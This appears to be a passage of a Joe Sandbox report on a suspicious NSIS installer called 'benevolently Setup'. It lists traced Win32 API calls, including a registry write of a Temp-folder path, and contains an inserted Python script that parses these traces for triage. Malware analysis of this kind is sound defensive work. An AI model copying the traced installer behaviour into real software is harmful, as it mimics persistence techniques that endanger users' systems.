                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                    • Opcode ID: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                                                                                                                                                                                    • Instruction ID: 6644526d81fa5c7ff175c86addd85cc92bc24fd3ec06af29a2511a4f4fc8a5d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B21BC71800124BBDF216FA5DE89D9E7B79EF04324F10423AF924762E0CA784D418FA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(benevolently Setup: Installing,benevolently Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                                                                                                                                                                                    • wsprintfA.USER32 ref: 004048F3
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,benevolently Setup: Installing), ref: 00404906
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                    • String ID: %u.%u%s%s$benevolently Setup: Installing
                                                                                                                                                                                    • API String ID: 3540041739-845447607
                                                                                                                                                                                    • Opcode ID: 9b3151ba7cee540e98112a4d3c0185064291859b30378dd226bea9325ccc70c9
                                                                                                                                                                                    • Instruction ID: 46e1028d5dd9cf3fa3a12b124fa319e283dc00677a7b855ac62dacd231200cde
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b3151ba7cee540e98112a4d3c0185064291859b30378dd226bea9325ccc70c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D11E477A041282BEB0075699C41EBF3298DB82374F24463BFE65F21D1E979CC1246E9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401D98
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                                                                    • Opcode ID: 4e723180d0b3fa804a5576cd7c509fc044a30b7d9b685e9650bac6fd0e0bc28f
                                                                                                                                                                                    • Instruction ID: e9269c0f41cd5a79e17a17131fa0488204b4df503fc5c3e11bd14e9e74a55962
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e723180d0b3fa804a5576cd7c509fc044a30b7d9b685e9650bac6fd0e0bc28f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 24014072944344AEE7006BB4AE49BA97FE8EB15705F109439F141B61F2CB790405CF6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?), ref: 00401D3F
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                                                                                                                                    • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D8A
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                    • Opcode ID: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                                                                                                                                                                                    • Instruction ID: b94dd0b2fc2efe961c915ac3dbaedcbaa59703da1128c811c259d0727350af9e
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0FFB2600515BFDB00EBA4DE88DAFB7BCEB44301B04447AF645F2191CA748D018B38
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000023,00000011,00000002), ref: 0040241B
                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 00402458
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 0040253C
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp
                                                                                                                                                                                    • API String ID: 2655323295-2109763640
                                                                                                                                                                                    • Opcode ID: 0b155a889f0a1852a4c8b5c80891aed8b0995d715a5fa6eccbfd1d5d818aefb1
                                                                                                                                                                                    • Instruction ID: f3bc197a49376025d104d1766b7c26e04d62aafcfa214307c08bf0afb556c6f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b155a889f0a1852a4c8b5c80891aed8b0995d715a5fa6eccbfd1d5d818aefb1
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD117271F00215BEDF10AFA59E89A9E7A74DB54314F20403AF908B61D1CAB84D419B68
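The function above is the one place in this excerpt where a registry value is written, and the value data visible in the RegSetValueExA call is a path under the user's Temp directory. When triaging a report like this by hand, two things trip people up: the "APIs" listing prints stack slots rather than true parameters (RegCloseKey takes a single HKEY, yet the same Temp path shows up among its "arguments" because it is still sitting on the stack), and a "?" marks a value the static pass could not resolve. The Python below is an added example, not Joe Sandbox code or a Joe Sandbox feature: it parses API lines in the format shown on this page, orders calls by their ref address, trims each argument list to the documented Win32 parameter count so stack residue is not mistaken for data, and flags registry writes whose data is a path under AppData\Local\Temp. The sample lines are copied from this excerpt; the parameter-count table is from the Win32 API documentation; the Temp-path heuristic is a triage rule of my own, not a detection the report itself asserts.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Sample input copied from the "APIs" listings of two functions in this report excerpt.
SAMPLE_LINES = r"""
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000023,00000011,00000002), ref: 0040241B
• RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 00402458
• RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 0040253C
• GetDC.USER32(?), ref: 00401D98
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
• MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
• ReleaseDC.USER32(?,00000000), ref: 00401DCB
• CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A
"""

# One report line: "<api>.<dll>(<comma separated args>), ref: <8 hex digits>"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Documented parameter counts (Win32 API reference). Anything the report prints
# beyond this count is a stack slot, not an argument the API consumes.
REAL_PARAM_COUNT: Dict[str, int] = {
    "GetDC": 1, "GetDeviceCaps": 2, "MulDiv": 3, "ReleaseDC": 2, "CreateFontIndirectA": 1,
    "GetDlgItem": 2, "GetClientRect": 2, "LoadImageA": 6, "SendMessageA": 4, "DeleteObject": 1,
    "lstrlenA": 1, "lstrcatA": 2, "CharPrevA": 2,
    "RegSetValueExA": 6, "RegCloseKey": 1, "RegEnumKeyA": 4,
}

REG_WRITE_APIS = {"RegSetValueExA", "RegSetValueExW", "RegSetValueA", "RegSetValueW"}
TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


@dataclass
class ApiCall:
    api: str
    dll: str
    args: List[str]   # raw slots as printed; "?" means statically unresolved
    ref: int          # address of the call site


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report lines into ApiCall records, ordered by call-site address."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "APIs" or "Strings" are skipped
        raw = m.group("args")
        args = raw.split(",") if raw else []
        calls.append(ApiCall(m.group("api"), m.group("dll").upper(), args, int(m.group("ref"), 16)))
    return sorted(calls, key=lambda c: c.ref)


def trim_to_parameters(call: ApiCall) -> List[str]:
    """Drop stack residue: keep only as many slots as the API actually takes."""
    return call.args[: REAL_PARAM_COUNT.get(call.api, len(call.args))]


def api_sequence(calls: List[ApiCall]) -> List[str]:
    return [c.api for c in calls]


def dlls_used(calls: List[ApiCall]) -> List[str]:
    return sorted({c.dll for c in calls})


def temp_path_registry_writes(calls: List[ApiCall]) -> List[Tuple[str, str, str]]:
    """Registry value writes whose (real) arguments carry a path under AppData\\Local\\Temp.

    Returns (api, call-site address, path). Trimming first means the Temp path that the
    report prints under RegCloseKey is correctly ignored as leftover stack contents.
    """
    findings = []
    for c in calls:
        if c.api not in REG_WRITE_APIS:
            continue
        for a in trim_to_parameters(c):
            if TEMP_PATH.search(a):
                findings.append((c.api, f"{c.ref:08X}", a))
                break
    return findings


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LINES)
    print("sequence:", " -> ".join(api_sequence(calls)))
    print("dlls:", dlls_used(calls))
    for api, ref, path in temp_path_registry_writes(calls):
        print(f"registry write of Temp path at {ref}: {api} -> {path}")
```

Arguments are split on commas because the report does not quote string values; a path containing a comma would need a smarter split. Unknown APIs fall back to keeping every printed slot, so extend REAL_PARAM_COUNT before relying on the trimming for other functions in the report.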
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00405903
                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 0040590C
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 0040591D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004058FD
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 2659869361-3355392842
                                                                                                                                                                                    • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                                                                                                                                                    • Instruction ID: 647ad7e742d71b16062aa4f61d1124f0b3f0fcedfae467302285f0529c6cb9e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46D0C9A2606A317AD21227159C09EDB6A4CCF57755B054076F640B61A1CA7C4D428BFE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C43
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$Enum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                                                                    • Opcode ID: 11be2661f8599cd0237f1c1554e4f8b4188825d64962de0b1740bf644c97f38e
                                                                                                                                                                                    • Instruction ID: b62f4967d327be975f6bbb281b4945b449d6b6e398a7fc8ef6fb9c274ae0afe8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11be2661f8599cd0237f1c1554e4f8b4188825d64962de0b1740bf644c97f38e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A118832500109BBEF01AF91CF09B9E3B79EF08341F104036BA05B50E0E7B4EE52AB68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402D15
                                                                                                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402D40
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                    • Opcode ID: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                                                                                                                                                                    • Instruction ID: 5343e4f3fd542578671bd54a8d6f819db7b5394acccd132b40ed42660498aa91
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F05430601521EBC7207F24FE8CA8F7A64BB08B11791047AF445B21F4DBB448C28B9C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040502F
                                                                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 00405080
                                                                                                                                                                                      • Part of subcall function 00404072: SendMessageA.USER32(0001044A,00000000,00000000,00000000), ref: 00404084
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                    • Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                                                                                                                                                                    • Instruction ID: 2f0027df7ddfe28b71d6e39f600ecebaf2ba5c74aec8f2e947ae9809186c917a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48017171500609ABDF205F51DD80E6F3B65EB84754F14403BFA01751D2C77A8CA29F9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,benevolently Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(?,?,0042BC78,?,00405A02,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                                                                                                                                                                                    • lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A3E
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\), ref: 00405A4E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004059EB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 3248276644-3355392842
                                                                                                                                                                                    • Opcode ID: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                                                                                                                                                                                    • Instruction ID: 1f06baf1138d21f74630751e728cacf5283a8138a78bcc2982ba797f27b9272c
                                                                                                                                                                                    • Opcode Fuzzy Hash: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F0C831315DA256C622323A1D45AAF1B45CE87338709477FF891B12D2EB3C89439EBD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,761F3410,00000000,C:\Users\user\AppData\Local\Temp\,004036F8,00403512,?,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                    • GlobalFree.KERNEL32(004ABD58), ref: 00403741
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403720
